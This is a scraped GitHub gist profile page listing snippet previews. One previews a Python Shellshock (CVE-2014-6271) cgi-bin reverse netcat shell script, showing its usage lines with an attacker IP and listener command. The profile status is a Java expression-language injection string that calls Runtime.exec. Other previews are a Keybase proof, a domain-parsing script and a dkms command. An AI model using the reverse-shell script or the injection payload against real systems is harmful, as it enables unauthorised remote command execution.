Skip to content

Instantly share code, notes, and snippets.

View schniggie's full-sized avatar
๐Ÿ’ฃ
/${@๐š“๐šŠ๐šŸ๐šŠ.๐š•๐šŠ๐š—๐š.๐š๐šž๐š—๐š๐š’๐š–๐šŽ@๐š๐šŽ๐š๐š๐šž๐š—๐š๐š’๐š–๐šŽ().๐šŽ๐šก๐šŽ๐šŒ("๐š†๐šƒ๐™ต ๐™ฐ๐š๐š•๐šŠ๐šœ๐šœ๐š’๐šŠ๐š—")}/

แ„ƒฮ‰ะฏIฦงฦฌำจPฮ‰ฮฃะฏ (Bแ„‚ฮฃแ„ƒKMฮ›ะŸะŸ-)Dะฏฮฃฮ‰ฮฃะฏ schniggie

๐Ÿ’ฃ
/${@๐š“๐šŠ๐šŸ๐šŠ.๐š•๐šŠ๐š—๐š.๐š๐šž๐š—๐š๐š’๐š–๐šŽ@๐š๐šŽ๐š๐š๐šž๐š—๐š๐š’๐š–๐šŽ().๐šŽ๐šก๐šŽ๐šŒ("๐š†๐šƒ๐™ต ๐™ฐ๐š๐š•๐šŠ๐šœ๐šœ๐š’๐šŠ๐š—")}/
View GitHub Profile
@schniggie
schniggie / CVE-2014-6271_netcat_reverse.py
Created September 25, 2014 08:19
CVE-2014-6271 cgi-bin reverse netcat shell
#
#CVE-2014-6271 cgi-bin reverse shell
#Use netcat -l -p 8080 to receive the reverse shell
#
import httplib,urllib,sys
if (len(sys.argv)<4):
print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
print "Example: %s localhost /cgi-bin/test.cgi '10.0.0.1 8080'" % sys.argv[0]
@schniggie
schniggie / keybase.md
Created January 5, 2015 22:07
keybase.md

Keybase proof

I hereby claim:

  • I am schniggie on github.
  • I am schniggie (https://keybase.io/schniggie) on keybase.
  • I have a public key whose fingerprint is 5160 DDC6 CDCF 625E 38DE 3988 2678 535E 3F18 708A

To claim this, I am signing this object:

@schniggie
schniggie / getDomains.py
Created October 31, 2019 08:24
Get Domain+TLD from list of URLs with or without protocol handler
!/usr/bin/env python3
import sys
import os
import tld
from tld import get_fld
def main():
filepath = sys.argv[1]
Here goes.
ls /usr/src/linux-headers-* -d | sed -e 's/.*linux-headers-//' | \
sort -V | tac | sudo xargs -n1 /usr/lib/dkms/dkms_autoinstaller start
Run as root.